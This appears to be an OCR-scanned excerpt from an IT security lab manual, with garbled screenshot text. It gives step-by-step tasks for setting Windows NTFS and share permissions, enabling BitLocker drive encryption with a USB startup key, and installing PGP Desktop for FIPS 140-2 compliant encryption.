Selecting this option means that the parent permission entries that apply to
::) child objects will no longer be applied to this object.
-

-Tocopy the permission entries that were previously applied from the
parert to this object, click Copy.

-To remave the permission entiies that were previously applied from the
parent and keep only those permissions explicitly defined here, click
Remove.

-To cancel this action, chick Cancel,

Bemove | Cancel |

26. Notice in the Inherited From column that the permissions are now shown as <Not
Inherited>. Click OK.

27. On the Security tab of the STUFF Properties dialog box, select Users, and then click
the Remove button.

28. The Security tab of the STUFF Properties dialog box should appear as shown here.
This sets the NTFS permissions on content within the STUFF folder.
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STUFF Propetties 2=l
Genera\l Sharting  Security |\N"Eb Sharing' Eustom\ze'

Group or user names:

ﬁ Administrators [MOBEER \Administrators)

€7 CREATOR OWMER
€8 SvSTEM

Add. Hemove
Deny

Permigsions for Clients DLG

Full Contral

tdodify

Read & Execute
List Folder Contents
Fiead

witite

izl Dirrninninie

For special permissions or for advanced settings, Advanced
click Advanced =

ak. I Cancel | Apphy |

29. Next, you must provide the share-point permissions for the Clients DLG. This is

managed by the Server service on the system. Select the Sharing tab in the STUFF
Properties dialog box.

General  Sharing I Secunlyl wieh Sharlng' Eustormze'

“V'ou an share this folder with other users on your
network. To enable sharing for this folder, click Share this
folder.

" Do not share this folder

Share name: IS TUFF

LComment: I

User lirnit: 1+ Masimum allowed

 Allow this number of users: =

- =l

To set permissions for users who access this [ — |
folder aver the netwark, click Permissions. =

To configure settings for offline access, click Caching |
Caching.

“windows Firewall is configured to allow this folder to be shared
with other computers on the network.

Wiew your Windows Firewall settings

oK I Cancel | Apply |

30. Click the Permissions button and observe the default share-point permissions provided
by the Server service. Click Add.

31. Click Advanced.
32. Click Find Now to display all users and groups in the domain.



33.
34.

35.

36.

37
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Select the Clients DLG. Then click OK.

Click OK a second time to add the Clients DLG to the access control list for the Share
Permissions.

With the Clients DLG selected in the upper pane, check the Allow Change permission
in the lower pane. This collection of Allow permissions grants the Clients DLG read
and write capabilities at this share point.

With the Everyone group selected in the upper pane, click the Remove button to

disallow unwanted users from accessing this share point. The resulting access control
list for the STUFF Share Permissions should appear as shown here.

Permissions for STUFF 21

Share Permissions I

Group or user names:
!ﬁ Clients DLG [MOBEERMClients DLG)

Pemissions for Clients DLG

Add

Allows

i Hemove

Deny

Full Contral O O
Change a
Read a
QK | Cancel | Applp |

Click OK to accept the permissions. Click OK to close the STUFF Properties dialog box.

Criteria for Completion

You have completed this task when you have assembled the proper AGDLP chain for
granting permissions. This includes granting NTFS permissions, managed by the NTFS file
system, to the proper local group, as well as granting share permissions managed by the
Server service to the same local group. You also removed all undesired permissions from
the access control lists to remain consistent with the principle of least privilege.

Task 4.9: BitLocker Drive Encryption

In this mobile world that we live in today, more people carry and use laptop computers to
keep up with business and personal computing needs. The use of portable computers increases
the likelihood that the computer will get lost or stolen. If the portable computer has sensitive
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data on it, either your own personal information or sensitive corporate data, many bad things
can happen, including identity theft and violation of legal and regulatory compliance
issues. Sensitive data on a laptop computer is often substantially more valuable than the
computer itself.

Because of the increased likelihood that the device may fall into a stranger’s hands, the
drives in portable computers should utilize additional security measures.

On computers, the first level of security relies on the successful logon by a user. If
a user cannot log on, the user’s data stored on the device is inaccessible. This level of
security can be defeated by removing the disk drive from the device and installing it on a
computer with an operating system where the stranger is a privileged user, like the local
Administrator. Then the permissions structure on the disk is not considered, and the new
local Administrator can access all data on the drive.

One of the recommended security measures to use on laptop computers is drive
encryption. This way, while a stranger may acquire the lost or stolen physical device itself,
they cannot access any sensitive data stored on the computer.

Scenario

You are preparing a new laptop computer for a traveling worker in your company. The
worker will need to access and store sensitive corporate data on the laptop. Your job is to
maximize the protection of that sensitive data.

Scope of Task

Duration
This task should take 2 hours.

Setup

You will need to perform a fresh installation of Windows Vista to enable and configure
Microsoft BitLocker Drive Encryption. A special partition structure is required on the
drive to be encrypted. After the installation of Windows Vista is complete, BitLocker must
be enabled.

BitLocker utilizes the latest encryption standard, called the Advanced Encryption
Standard (AES). AES uses the Rijndael (pronounced Rain-doll) cipher (or algorithm), a
symmetric-key, iterative, block cipher that utilizes key lengths of 128, 192, and 256 bits.
The longer the key, the stronger the cipher, but the slower the process due to more CPU
horsepower (clock cycles) required.

After AES encrypts the data, BitLocker implements two more manipulations in the AES
standard. Large volumes of ciphertext (like in drive encryption) tend to show patterns; the
additional functions implemented by BitLocker help to mitigate this vulnerability. Patterns
in ciphertext make it easier for a bad guy (called a cracker) to crack the encryption key. The
first diffusing function is called Cipher Block Chaining (CBC), and the second diffusing
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function is called the Elephant Diffuser. So the Rijndael cipher encrypts the data, and
then CBC and the Elephant Diffuser hide the patterns in the ciphertext. AES is currently
considered “uncrackable” for the next 100 years, unless the user does something to
compromise the system, such as share or expose their encryption key (or password).

BitLocker is designed to use an encryption key that gets stored in the TPM chip on the
motherboard (TPM stands for Trusted Platform Module and is currently at TPM v1.2).
This way, if the disk is ever removed from the device, the encryption key is unavailable, and
the data on the drive remains encrypted and secure. TPM is a fairly recent standard and is
not implemented on all motherboards. The good news is that BitLocker can be configured
to store this encryption key on a USB thumb drive instead of requiring a TPM chip.

Now the USB thumb drive becomes the key to unlocking the operating system on the
computer. Without the USB thumb drive inserted into a USB port, the computer simply
cannot boot up, since the operating system files cannot be decrypted. Without the USB
thumb drive, all data on the encrypted drive is also inaccessible. This is the feature that
you’re after. Secure the sensitive data on portable devices so that if the device gets lost or
stolen, a stranger cannot access the data. The user must remember not to store the USB
thumb drive with the laptop computer. If the bad guy gets both the device and the
USB thumb drive, they can access all data on the drive.

Caveat

Any time you encrypt data, you run the risk of not being able to decrypt the data. It is
a common occurrence that an encryption key gets lost or destroyed, and encrypted data
remains encrypted forever, unavailable for the intended user.

Procedure

You will need to perform a full, fresh installation of Windows Vista on a computer or
virtual machine. (You learned about virtual machines in Phase 2 of this book.) You will
need to configure specialized partitions prior to the installation of Windows Vista to
support BitLocker. Then after the installation of Windows Vista is complete, you will need
to configure BitLocker to use a USB thumb drive to store the decryption key.

A preconfigured Virtual PC trial version of Windows Vista can be downloaded from

www.microsoft.com/downloads/details.aspx?FamilyID=21eabb90-958f-4b64-b5f1-73d0
a413c8ef&displaylang=en

Microsoft’s Virtual PC can be downloaded from

www .microsoft.com/windows/virtual-pc/default.aspx

Equipment Used
For this task, you must have:

s Computer system (or virtual machine) with no data on the hard drive(s).

(Note that the computer must have a BIOS that can read USB flash drives before the
operating system initializes.)
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= 40 GB (minimum) of hard drive space.

= Installation media and a product key for Windows Vista Enterprise or Ultimate Edition.
s USB thumb drive. (Two USB thumb drives are preferred).

Details
Creating BitLocker Partitions

1. Boot the computer on the installation media for Windows Vista Enterprise or Ultimate
Edition.

Click Next on the Language, Time Zone And Keyboard Selection window.
On the resulting window, do not click Install Now. Instead, you must click Repair

Your Computer in the lower-left corner.

[ motvmdoms I

)

Wind oWs Vistar

Install now ‘3

What to know before installing Windows
air your computer

yright stion. All ights reserved

4. The System Recovery Options dialog box should appear with no operating systems
available in the window.

fl System Recovery Options x|

Select an operating system to repair and dick Next. Only Windows Vista
operating systems are listed and can be repaired,

ating System | Partition Size | Location
If you do not see your operating system listed, dick Load Drivers to load
drivers for your hard disks.

Load Drivers Next =

5. Click Next. Select Command Prompt from the System Recovery Options window.
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10.
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ﬁ System Recovery Options 3 ll

Choose a recovery tool
Operating system: Unknown on {Unknown) Local Disk

Startup Repair
Automatically fix problems that are preventing Windows from starting
System Restore

Restore Windows to an earlier paint in time

Windows Complete PC Restore
Restore your entire computer from a backup

Windows Memory Diagnostic Tool
Check your computer for memory hardware errors

Command Prompt
Open a command prompt window

Shut Down | Restart |

Type diskpart at the command prompt and press the Enter key. At the resulting
DISKPART> prompt, type select disk 0 and press Enter.

[+ Administrator: X:\windows\system32\cmd.exe - diskpart = D|1|
Microsoft Windows [Uersion 6.08.60808]1
lCopyright <c> 2086 Microsoft Corporation. A1l rights reserved.

i1 :“Bources >diskpart

Microsoft DiskPart version 6.8.6080

Copyright (C> 1999-2887 Microsoft Corporation.
n computer: MINWINPG

IDISKPART > select disk

Disk B is now the selected disk.

DISKPART > _

1=l
Check your compub'er far memory hardware errors
Command Prompt
Open a command prompt window
Shut Dawn Restart
L The next step is destructive and will cause the loss of all data on the disk drive.
ING Be sure you have backed up any desired data from this drive to remote media.

Type clean at the command prompt and press Enter to remove any existing partitions.

To create the system partition for BitLocker, at the command prompt type create
partition primary size=1500 and press Enter.

At the command prompt, type assign letter=S and press Enter.

To make the partition active, at the command prompt type active and press Enter.
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11. Next, you must create the Boot partition for the operating system. At the command
prompt, type create partition primary and press Enter. By not specifying a size, you
ensure that DiskPart will use all remaining available disk space for this partition.

12. At the command prompt, type assign letter=C and press Enter.

13. At the command prompt, type list volume and press Enter. The result should display
the CD-ROM with the source media and the two new partitions you just created.

vdministrator: X:\windows\system32\cmd.exe - diskpart F - | |5|
[PTSKPART> assign letter=s |2

DiskPart successfully assigned the drive letter or mount point.
DISKPART> active

DiskPart marked the current partition as active. J
IDISKPART> create partition primary

DiskPart succeeded in creating the specified partition.
IDISKPART> assign letter=C

DiskPart successfully assigned the drive letter or mount point.

DISKPART> list volume

Uolume BE#E Ltr Label Fs Type Size Status Info
Uolume B D  LRMCFRE_EN_ UDF CD-ROH 2555 MB  Healthy
Uolume 1 8 RAW Partition 15880 MB Healthy
% Uolune 2 Cc RAW Partition 3? GB Healthy
IDISKPART> _ hd|

¥
m Check your computer for memory hardware errors

Command Prompt

Open & command prompt windaw

Shut Down | Restart

14. At the command prompt, type exit and press Enter to quit the DiskPart utility.

15. At the command prompt, type format c: /y /q /fs:N'TFS and press Enter to format
the C:\ drive.

16. At the command prompt, type format s: /y /q /fs:NTFS and press Enter to format
the S:\ drive.

\dministrator: X:\windows\system32\cmd.exe 3 =101 x|
* Uolume 2 [ RAY Partition 39 GB Healthy -

DISKPART > exit
Leaving DiskPant...

®WisSources>format c: sy /y /Fs:iNTFS
The type of the file system is RAU.
The new file system iz NIFS. J
QuickFornatting 39458M
iCreating Ffile system structures.

ormat complete.

40484988 KB total disk space.

40338008 KB are available.

®:“Sources>format s: sy sg ~fs:NTES
The type of the file system iz RAW.
The new file system is NIFS.
QuickFormatting 1588M

ICreating file system structures.
[Format complete.

1535996 KB total disk space.
1526012 KB are available.

K:\Sources>_ =l

_@ Check your computer for memory hardware errors

Command Prompt

Open & command prompt window

Shut Down Restart
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17. At the command prompt, type exit and press Enter to leave the command prompt.

18. Click the X in the upper-right corner to close the System Recovery Options window.
Do not click Shut Down or Restart. Closing this window should return you to the
Install Now window.

19. Click Install Now and complete the installation of Windows Vista. Install Windows
Vista on the large partition, not the 1.5 GB partition.

Enabling BitLocker to Use a USB Thumb Drive

1. After the Windows Vista installation is complete, log into Windows Vista as an
Administrator.

2. You must enable the use of the USB thumb drive to store the decryption key. Click
Start » Search and type gpedit.msc; then press Enter.

Programs

nﬁ] gpedit

Miller
Docurments
Pictures
Pefuisic
Garnes
Search

Recent [tems

"Q See all results

p Search the Internet

—

3. This opens the Local Computer Policy. Expand Computer Configuration »
Administrative Templates » Windows Components and click BitLocker Drive
Encryption.
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n%] Group Policy Object Editor
File Action Wiew Help

=] Local Computer Palicy “ || Setting State
4 Cfnrgpfl.tl‘t’:r Cﬂsnflguratlnn i=| Turn on BitLocker backup to Active Directory Dormain Servic.. Mot configured
" % oftiare Settings (2] Control Panel Setup: Configure recovery falder Mot configured
[ [ Windows Settings

12| Control Panel Setup: Configure recovery options Mot configured

a4 [] Administrative Templates
< Control Panel Setup: Enable advanced startup options Mot configured
&[] Contral Panel

m

o I Network =| Configure encryption method Mot configured
[ Printers Prevent mermary overarite on restart Mot configured
b [ System |i=] Configure TPM platform validation profile Mot configured

a [] WWindows Components
ActiveX Installer Service
Application Campatibility
AutaPlay Policies

Backup

BitLocker Drive Encryption
Credential User Interface
Desktop Window Manager
Digital Locker

Event Log Service

Event Viewer

Game Explorer
ImportVideo

Internet Explorer
4 T 3 Extended )\Standar’d

EDELEUDELEED

4. Double-click on the option Control Panel Setup: Enable Advanced Startup Options.
Enable the Allow BitLocker Without A Compatible TPM check box and click OK.
Doing so allows BitLocker to use the USB thumb drive instead of the absent TPM chip.

Bﬁ] Group Policy Object Editor [EI=EEE]

File Action Wiew Help
L A0l o REREYN 7|

| =] Local Computer Policy * || Setting

1] Turn on BitLocker backup to Active Directory Domain Servic..,
=| Contral Panel Setup: Configure recovery folder

Control Panel Setup: Configure recovery options

Control Panel Setup: Enable advanced startup options

Control Panel Setup: Enable advanced startup options Proper..,

Setting | Explain

E} Contral Panel Setup: Enable advanced startup options

=| Configure encreption method

Prevent memary overwrite on restart

=

|| Configure TPM platform validation profile

ot Configured

Allove BitLocker without a compatible TP
[requires a startup key on a USEB flash diive)

&

Settings for computers with a TPM

Configure TPM startup key option:

[Allow uger ko create or skip ']

Conligure TPM startup PIN option;

[Allnw user to create o skip v]

IMPORTANT: IF pou require the startup key. &2
Supported on: At least Windows Yista

] < [ r
Extended )\ Standard

[ Previous Setting ][ Mext Setting

[ 0K ][ Cancel H Apply ]
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5. Close the Group Policy Object Editor utility.

6. To force the policy change, click Start » Search and type cmd, and then press Enter. In
the command window, type gpupdate /force.

icrosoft Windows [Uersion 6.8.68801 a
opyright (c> 2886 Microsoft Corporation. All rights reserved.

:NUserssMillerrgpupdate /force

pdating Policy...

ser Policy update has completed successfullsy.
omputer Policy update has completed successfully.

NUserssMiller>

7. Close the command window after the command completes.

Creating BitLocker Drive Encryption USB Keys and Recovery Password Keys
1. Insert the USB thumb drive and confirm that it is recognized by the operating system.
2. Click Start » Control Panel » Security » BitLocker Drive Encryption.

e |
m"w « Security » Bitlocker Drive Encryption - | ‘y| |Semth R |
@

BitLocker Drive Encryption encrypts and protects your data.

BitLocker Drive Encryption helps prevent unauthorized access to any files stored on the
volume shown below. You are able to use the computer normally, but unauthorized
users cannot read or use your files,

‘What should T know about BitLocker Drive Encryption before Iturn it on?

& c\ . off

Turn On BitLocker

See also

Disk Management
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3. Click the Turn On BitLocker link. Click the Require Startup USB Key At Every Startup
option. This is the only option for a non-TPM system.

E=H|EEE| 5
@ Lg# BitLocker Drive Encryption

EE]EE]
Set BitLocker startup preferences )
This computer does not appear to have a TPM. To use Bitlocker Drive @
Encryption, a startup key on a USE memory device will be required every ur data.
time you start the computer.

ly files stored on the

What is a BitLocker Drive Encryption startup key or PINZ ut unauthorized

© Use BitLocker without additional keys ton?
< Require PIN at every startup

* Require Startup USB key at every startup

@ Some settings are managed by your system administrator.
See also

Disk Managen|

4. Select the USB thumb drive and click the Save button. The BitLocker Encryption Key is
a small, binary (unreadable) file about 1KB in size, and it has a .bek extension.

You may need to remove and reinsert the USB thumb drive to have it
TE recognized by BitLocker.

@ Ly BitLocker Drive Encryption

Save your Startup Key

Insert a removable USE memory device and select its drive, then click Save.

CRUZER (F:)

e
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Next, BitLocker prompts you about where to save the BitLocker Recovery Password.
You would use this password to access the operating system if you ever lost the USB
thumb drive containing the BitLocker key. Notice that you can save the BitLocker
Recovery Password on a USB thumb drive or in a folder, or you can print it out.

f=E s

) gu BitLocker Drive Encryption

Save the recovery password

Save the recovery passwerd for use if BitLocker blocks computer startup.

tLocker Drive Encryption might block vour computer from starting

& Save the password on a USB drive
g Save the password in a folder
Qﬁj Print the password

Recommendation: Save multiple copies of the recovery password.

Some settings are managed by your system administrator.

Cancel

il Microsoft recommends that you do not store the BitLocker Recovery Password

ING on the same USB thumb drive that holds the BitLocker key. If you want to save
the BitLocker Recovery Password on a USB device, connect a second USB
device to the system and select the second USB device as the storage location.

=EEE]

\-_) Gg# BitLocker Drive Encryption

Save the recovery password

Save the recovery password for use if BitLocker blocks computer startup.

Why Bitl ocker Drive Encryption might block your computer from starting

4

& Save the password on a USB drive

=4 53 Save a Recovery Password to a LISB Drive ==

ﬂ prl &7 In.sert the USB device, select it in the list, and
click Save.

Recommendatio

e CRUZER (F:)

e
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2 Even though Microsoft recommends making several copies of the BitLocker

ING Recovery Password to protect against losing it, all copies of the password
must be strictly protected from unauthorized disclosure. This password
allows access to the encrypted hard drive.

6. When BitLocker reports that it successfully saved the BitLocker Recovery Password on
the second USB thumb drive, click Next.

=

. ¥ BitLocker Drive Encryption

Save the recovery password

Save the recovery password for use if BitLocker blocks computer startup.

Why BitLocker Drive Encryption might block your computer from starting

& Save the password on a USB drive
é Save the password in a folder
- Print the password

Recommendation: Save multiple copies of the recovery password,

.
@ Your recovery password has been saved.
v

The BitLocker Recovery Password is an ASCII text file and reads something like this:

The recovery password is used to recover the data on a BitLocker
protected drive.

Recovery Password:
279697-193534-062755-443344-016808-619696-579029-211155

To verify that this is the correct recovery password compare
these tags with tags presented on the recovery screen.

Drive Label: MILLER-PC C: 6/14/2008.

Password ID:

{94FF4CF7-4A04-4DCD-AD75-E8DDDA63931D}



Task 4.9: BitLocker Drive Encryption 231

Implementing BitLocker Drive Encryption

1. BitLocker prompts you to perform a test of the BitLocker key and recovery password. This
requires a reboot of the system. This reboot could be avoided by deselecting the check box
and clicking the Continue button, but it is better to perform this test prior to encrypting the
entire C:\ drive. Leave the check box enabled and click the Continue button.

[E=E(Eo )
@ Lge BitLocker Drive Encryption

Encrypt the volume

The selected volume is C:\

You can continue to work while the volume is being encrypted. Computer
performance will be affected and disk free space is used during encryption.

Run Bitlocker system check

The system check will ensure that BitLocker can read the recovery and
encryption keys correctly before encrypting your volume, Insert the
recovery password USB flash drive, BitLocker will restart your computer
to test the system befere encrypting.

Mote: Without the system check, there is a risk that you will need to
enter the recovery password manually to access your data.

)/ Notice the warning about degraded performance of the system while
AéTE BitLocker is encrypting the drive. It could take anywhere from a few minutes

to a few hours to complete the encryption process, depending on the
amount of content on the drive and the performance of the hardware.

2. Click the Restart Now button to initialize the BitLocker test and reboot the system.

3. If BitLocker is unable to initialize the BitLocker key, you will receive an error message.

BitLocker Drive Encryption

§ BitLocker could not be enabled.

L 4
The BitLocker startup key or recovery passwerd could
not be read from the USB device. Ensure the USB
device is plugged into the computer, then tum on
BitLocker and try again. If the problem persists contact
the computer manufacturer for BIOS upgrade
instructions.

No encryption applied, any changes made to C:
during BitLocker setup will be removed.
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4. If the BitLocker Encryption Key is read correctly at startup, you will see a brief message
stating “Windows BitLocker Drive Encryption key loaded. Remove key storage media.”

5. You should remove and secure the USB thumb drive that holds the BitLocker key.
The system will continue to boot up, and the drive encryption process will begin. This
encryption process can take several hours to complete and system performance will
be degraded until the process is complete. You can pause the encryption process and
resume it later if necessary.

BitLocker Drive Encryption @
Encrypting...
Drive C: 62% Completed

6. BitLocker will report completion of the drive encryption process.

BitLocker Drive Encryption E==|

r-?'{( Encryption of C: is complete.

Close

7. Other than requiring the USB thumb drive that holds the BitLocker key at startup, you
should see no difference in the operation of the system.

Criteria for Completion

You have completed this task when you have successfully recorded the BitLocker Encryption
Key and the BitLocker Recovery Password on two different USB thumb drives, and have
successfully encrypted the C:\ drive of your computer.

Task 4.10: Securing Data to Satisfy FIPS
140-2 Using PGP Desktop

You have implemented several techniques to protect sensitive data on computer systems. Why
would you need another? If your organization is subject to any legal or regulatory compliance
requirements, a core component of most of these is the requirement for “prudent security” to
be the foundation of the information systems. A way to demonstrate prudent security in your
environment is to base your IT system configuration on preestablished standards or published
best practices.
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In the United States, the National Institute of Standards and Technology (NIST) publishes
sets of standards for implementing various types of technologies, including secure IT systems.
One of these standards addresses encryption for sensitive but unclassified data and is called
the Federal Information Processing Standard (FIPS), publication 140, currently at revision 2
(i.e., FIPS 140-2).

The core cryptographic technologies underlying PGP Desktop, a commercial encryption
tool, have been validated to be in compliance with FIPS 140-2. While there may be some
rare exceptions, if you are protecting your business data in compliance with FIPS 140-2,
you are implementing prudent security and therefore have established the foundation of
compliance in this regard.

The FIPS 140-2 standard can be downloaded from the NIST website at

http://csrc.nist.gov/publications/fips/fipsl40-2/fips1402.pdf

Other NIST standards and publications on security management and assurance can be
found at

http://csrc.nist.gov/groups/STM/index.htm]l

Scenario

Your company has opened a new division that is subject to regulatory compliance
requirements. You must assure the sensitive data that is the target of this regulation is
protected in a compliant manner. The encryption solution proposed for the new division
uses the PGP Encryption Platform.

Your client computers run Windows 7. You need to install and test PGP Desktop on a
new Windows 7 computer to help ensure a smooth rollout.

Scope of Task

Duration
This task should take 60 minutes.

Setup

You will create and then access an encrypted Zip file using PGP Desktop client software on
a new, fully patched Windows 7 client system.

Caveat

Any time you encrypt data, if you somehow lose access to the decryption key(s), you may
permanently lose access to the important data. PGP uses long passwords, called passphrases.
If you use PGP to protect important data and forget your passphrase, you may not be able
to recover your data—ever.
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Procedure

For this task, you will download and install PGP Desktop client software onto a new, fully
patched Windows 7 client system. Then you will use the PGP Zip utility to compress and
encrypt several test files.

Equipment Used

For this task, you must have:
= A new, fully patched, Windows 7 client system

s Local Administrator access

= Internet connectivity (or a downloaded copy of PGP Desktop v9.12 or higher)

You will need to know the version of the Windows 7 operating system you
TE are running, either 32-bit or 64-bit. You can find this information in the
Windows System Properties. On your Windows 7 system, click Start, right-

click Computer, and select Properties. Observe and note the System Type
value, either 32-bit or 64-bit.

| | Getting Started 3

! Connect ta a Projectar

[ D |
%;) Remote Desktop Cannection SEHTERES

Pictures
Sticky Motes

Music
Snipping Tool

Computer

Calculator Open

Control Pane! [ aRLELEYS

{"D‘\(
-
ES

il XPS Viewer
&‘af Windows Fax and Scan

Microsaft Silverlight

—— Map network drive...

Disconnect network drive...

Default Pro
SR Show on Desktop

Rename

Properties

w

> AllPragrams




Task 4.10: Securing Data to Satisfy FIPS 140-2 Using PGP Desktop 235

i BT )
U(_._J |‘Bi <« System and Security » System - ‘ 3 ‘ | Search Control Pans! pel |
@ -

Control Panel Home . . .
View basic information about your computer
'&I Device Manager Windows edition
) Remote seftings Windows 7 Enterprise
W) System protection Copyright © 2009 Microsoft
@l Advanced system settings Corporation. All rights reserved.
System
Rating: -:_’_:l Windows Experience Index
Processor: Intel(R) Xeon(R) CPU 5120 @
186GHz 1.86 GHz
Installed memory (RAM): 100 GB

System type: 64-bit Operating System
Becuis Pen and Touch: Mo Pen or Touch Input is available for
Action Center this Display
findmslinies Computer name, domain, and workgroup settings
Perfermance Information and s
Tools Computer name: WINTENTE4 B Change settings
Full computer name: WINTEMTES -
)’ This technique can also be used with Windows XP Professional, Windows
‘drs Vista, and Windows Server 2003, 2008, and 2008 R2.

Details

Acquiring the PGP Desktop Software

1. Log on to the new Windows 7 system as the Local Administrator.

2. Launch Internet Explorer by clicking the Internet Explorer icon on the Taskbar.

3. To navigate to the PGP Desktop download page, go to
www. pgp.com/downTloads/desktoptrial/desktoptrial2.html

Carefully review the PGP Software License Agreement.
Check the “I have read and agree to...” check box at the bottom of the agreement.
Click the Accept button.

N o o s

Verify that the available version is v9.12 (required to support Windows 7) or higher
(currently at v10.1.1). Click the Download button for PGP Desktop for Windows.
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If you receive the following notice in your browser, click on the warning banner and

select Download File.

g PGP Corporation - Downloading File - Windows Internet Explorer & - EIEIQ
@Q 7 | http:// download pgp.com/cgi-bin/downlo v| 2] |‘7| A | ‘ Bing Fel -

estec Sites v @ | Web Slice Gallery

{3 Favarites i,;; ﬂ 5
PGP Carporation - Downloading File Eh - v = Eél ¥ Page~ Safety v Toals '@' &

»

li, Ta help pratect your security, Internet Explarer blacked this site fram downloading files to your computer. Click here for options... X

9. Click the Save button in the File Download dialog box.

s ol
File Download @

Do you want to open or save this file?

i Mame: PGPDesktopld.l.l Windowszip
Type: Compressed izippec Falder, 61.4MB
From: download.pap.com

Open ][ Save ][ Cancel J

Always aszk before opening this twpe of file

l-" T “whhile files from the Intemet can be useful. some files can potentially
@ harm pour computer. If you do not tust the source, do not open or
= save this file. What's the risk?

— =

f—

10. Save the file to the desktop by clicking the Desktop icon in the left-hand pane and then
clicking Save.

11. When the download completes (typically over 70 MB), close all windows to show the

desktop.

Installing PGP Desktop
1. Double-click the PGP Desktop icon on the desktop.

=

o

TE

If the system you are logged onto is not a domain controller, you can install
these tools by running Adminpak.msi, which is located in the Windows\
System32 folder on every server-class system by default.

2. On the menu bar, click Extract All Files.

o o) |
Q‘Q [+ PGPDesktop10.L.L Wind... <[4 | [ Searcn ktopl01l Windows |
Organize * Extract all files =~ 0 @
¢ Favorites Hame ) Type [
%
B Desktop i) PGPDesktop10.1.1 Windows_Inner  Compressed zipped) Fol
& Downlaads || PGPDesktop10.1.1 Windows_Inner...  SIG File
] Recent Places
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Accept the default settings for the extraction, which will place the extracted files on

the desktop. Click the Extract button.

[

Show extracted files when complete

La
ot - m
Recycle Bin [
U | 1) Extract Compressed (Zipped) Folders
i Select a Destination and Extract Files
PGPDeskto... Files will be extracted ta this folder:
[C:\Users\Bull\Desktop\PGPDesktop 0. 1.1 Windows] Browse...

AEIE

1:47PM

- [me 5T
08 oo |

Double-click the PGPDesktop_XXX_Windows_Inner compressed file.

On the menu bar, click Extract All Files.

Accept the default settings for the extraction, which will place the extracted files in the
PGP folder on the desktop. Click the Extract button.

If your version of the Windows 7 operating system is 32-bit, double-click the
PGPDesktopWin32 installation file. If your version of the Windows 7 operating system
is 64-bit, double-click the PGPDesktopWin64 installation file.

%) Recent Places

4 Libraries
[ Documents
& Music
=] Pictures
BE videos

% Computer

€W Network

[ [E=EE)
O\J [y PGP v PGPDesktopL. ~ 42| Searen . P
Organize v Include in library = Share with » Bum  » ~ 0l @

e Name ’ Date modified Typ
B Desktop B3l POPDesktopWin32-10.L1 LI/ 203P Appl
& Dawnloads 3l PGPDesktopWing4- 10,11 L0011 203 P App)

, 2 items
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8. In the Open File — Security Warning dialog, click Run to launch the PGP Desktop
installation utility.

9. To accept English-language installation, click OK.

10. Review and then accept the PGP Corporation End User License Agreement and
click Next.

11. To display the PGP Desktop Release Notes for this version, select to display the release
notes and click Next. Otherwise, just click Next.

12. If the User Account Control dialog box opens, review the details and then click Yes to
allow the installation to proceed.

@ User Accaunt Cantral @

=

U Do you want to allow the following program from an
unknown publisher to make changes to this computer?

Program name:  Ch\Users\Bull\AppData\Local\ Temn..\PGPDesktop.msi

Publisher: Unknown
File origin: Hard drive on this computer
Program location: Install

10.1.1.10

PGP Corporation
English (United States)
Ci\Users\Bull\AppData\Local\ Temp\PGP1861c\PGP...

'ZE:' Hide details

Change when these notifications appear

13. To complete the installation of PGP Desktop, click Yes and restart the Windows 7
computer.

ﬁ[nstal\erlnfun‘nation [——

“f'ou must restait your system for the configuration changes made
to PGP Deskiop to take effect. Click “es ta restart now or Mo if
you plan to restart manually later,

)/ You may delete the PGP installation folder from the desktop once
A&TE installation has been completed.
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Log on to the new Windows 7 system as the local Administrator.
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The PGP Setup Assistant wizard should automatically launch after login. Confirm that
you want PGP to be available for the logged-in user account by clicking Yes, and then

click Next.

PGP Setup Assistant

PGP Desktop

Enable User ~/

Licensing

New User

Key Generation
Global Directory
Messaging
Additional Features

Enabling PGP

If wou do not intend to use PGP from this account, it is not necessary ko complete the

configuration wizard. If you change your mind later, just run the PGP Deskkop application,

Do you want to enable PGP to be available from this account?

@ vYes

) Mo

< Back [ Mext = ][ Cancel ] [ Help

Enter your name, organization, and email address (twice), and then click Next.

PGP Setup Assistant

P& P Desktop

Enable User ~/
Licensing~’

New User

Key Generation
Global Directory
Messaging

Additional Features

Licensing Assistant: Enable Licensed Functionality

The license number that enables the Functionality of PEP Desktop will be linked ko
the name, organization, and email address entered here, IF you have previously
used your license number, make sure ta enter the same information as befare,

Marne:
Drganization:
Email Address:

Confirm Email Address:

< Back Mext = ][ Cancel ] [ Help
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4. On the Licensing Assistant screen, choose the “Use without a license...” option and
click Next.

PGP Setup Assistant

Licensing Assistant: Enter License

PSP Desktop

Enter the license number received For your purchase or upgrade below., If you do
not have a license number, you may use the product with most features disabled.
‘ou may also select this option ko enter a license number at a later time.

Enable User +/
Licensing ~
New User
Key Generation () Enter your license number
Global Directory
155a0ing _ _ _ _
Additional Features

®

| Use without a license and disable most Functionality

[ < Back ][ Mext = ][ Cancel ] I Help ]

5. Since you will be running an unlicensed trial installation, several features will be
disabled, as you see on the next screen. Click Next.

6. Choose the ] Am A New User option. Doing so triggers the creation of new PGP keys
for the logged-on user account. Click Next.

PGP Setup Assistant
User Type
P -
= DGSk top This assistant will help vou configure PGP and initialize your keys.
Enable User~/ Please select one.

Licensing ~ @1
New USEI‘*' = arm a New User,

(71T have used PGP before and [ have existing keys.

Key Generatioh
Global Directory

essaging
Addigiohal Features

< Back Mext = ][ Cancel ] [ Help
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Since you will not be using a hardware token, click Next to continue the key-generation

process.

PGP Setup Assistant

PGP Desktop

Enable User
Licensing «

New User ~/

Key Generation ~/
In f

of
Messagi
Additional Feature/

PGP Key Generation Assistant

This assistant will help you generate a new PGP key, A& key is required by each
patticipant in the secured email loop, Using a key will also provide the highest level of
convenience when creating PGP Archives and PGP Disks,

IF you would like mare information on what a key is and how PGP works, choose the
PiaP Desktop Help menu.

If you use a hardware token please insert it now. Your token information will display
below.

Generate Key on Token:

Choose Mext to continue, or Skip to jump to the next section

Skip

< Back [ Mext = ][ Cancel ] [ Help

Enter your full name and email address. For the purposes of this exercise, you

should not need to enter additional addresses, but if you want to associate your PGP

encryption keys with multiple email addresses, click the More button to enter the

additional email addresses.

PGP Setup Assistant

P& P Desktop

Enable User~/
Licensing ~ '.
New User~/

Name and Email Assignment

Ewery key pair must have a name associsted with it, The name and email address let
your correspondents know that the public key they are using belongs to you,

Full Mame: (]

Primary Email:

Other Addresses:

Click. Adwanced for more key settings.

[ < Back ][ Mext = ][ Cancel ] [ Help
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9. Click the Advanced button to review the various key, cipher, hash, and compression
options. Do not make any changes to the settings in this dialog box.

"
Advanced Key Settings @

Keytype: |RSA -

[7] Generate separate signing subkey
Signing key size: 2043 1024 - 4096

Encryption key size: 2043 1024 - 4096

Expitation: (@ never @ | yzofzo1z

